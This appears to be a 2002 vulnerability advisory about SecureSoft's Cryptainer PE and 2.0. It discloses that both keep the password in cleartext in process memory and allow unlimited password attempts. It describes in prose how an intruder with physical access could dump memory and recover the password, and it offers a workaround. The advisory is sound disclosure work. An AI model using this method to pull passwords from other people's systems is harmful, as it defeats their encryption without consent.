Vendor: SecureSoft
Version Affected: Cryptainer PE and Cryptainer 2.0
Type: Password Disclosure
Severity: Medium
Date released: 16th December, 2002

Background
From vendor website: "Cryptainer PE's ease of use together with its powerful 448 bit strong encryption provides file security without changing the way you work. It creates a 100MB encrypted drive that can be loaded and unloaded as required. It combines ease of use and simple drag-and-drop operations with powerful 448 bit strong encryption ensuring total security with phenomenal ease of use and maximum convenience!" Both products use the Blowfish algorithm.

I. Description
Both the versions of Cryptainer store the password in clear text in the memory of the process without encrypting it or nullifying it. This password is clearly visible as long as the following two conditions are satisfied:

1. The user has entered the password at least once
2. Cryptainer is loaded
The encrypted volume may or may not be loaded. Since this product comes with an option to minimize to the System Tray, it is quite likely that the user would keep Cryptainer running without loading the encrypted volume containing the encrypted files. In such a case, a user might assume that since the encrypted volume is not loaded, his files are safe. But an intruder who is able to dump the memory of the running process can ferret out the password with relative ease. Besides the password, the physical path of the volume is also clearly visible. Also Cryptainer does not provide a limit to the number of wrong password attempts. So an intruder must collect the memory dump, and copy the physical location of the logical volume (which is actually one big file) onto his machine, and then run Cryptainer and check all the strings in the memory dump for the correct password.

II. Impact
First of all, the intruder would need to have physical access to the PC in order to gather a physical dump. Moreover, it would be necessary to have Cryptainer running - either with the encrypted volume loaded or unloaded. This however is not so uncommon. On the other hand, it is in the event of a physical intrusion, that one would need the encryption software to protect one's data. Therefore, the physical access event must be assumed as having occurred. Then, the estimated probability of a compromise must be that of Cryptainer running in the System Tray, and the user having used the software at least once.

III. Vendor Response
The vendor response is not clear. A solution might come in the next release - first quarter of 2003. The intruder may also install a keylogger to exploit this vulnerability.

III. Workaround
Do not keep Cryptainer minimized in the System Tray even if you have unloaded the encrypted volume. Exit the software as soon as you have finished encrypting/decrypting the files, by clicking on the Shutdown and Exit button.

References
A similar vulnerability was found in Password Safe written by crypto-guru Bruce Schneier. http://www.counterpane.com/crypto-gram-0111.html#6